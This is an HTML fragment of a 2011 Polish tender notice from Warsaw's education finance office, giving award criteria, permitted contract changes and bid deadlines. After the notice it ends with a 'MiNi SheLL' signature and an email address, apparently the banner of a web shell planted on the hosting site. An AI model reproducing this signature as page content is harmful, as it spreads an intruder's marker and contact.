<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy na podstawie art. 144 pzp poprzez wydłużenie terminu realizacji umowy w sytuacji, w której wykonawca z obiektywnych przyczyn nie jest w stanie wykonać zamówienia w terminie pierwotnie wskazanym w umowie, zaś nie można było tego przewidzieć w chwili podpisywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mbfo.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Biuro Finansów Oświaty m. st. Warszawy ul. Mokotowska 55, 00-542 Warszawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2011 godzina 09:00, miejsce: Miejskie Biuro Finansów Oświaty m. st. Warszawy ul. Mokotowska 55, 00-542 Warszawa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 30.12.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com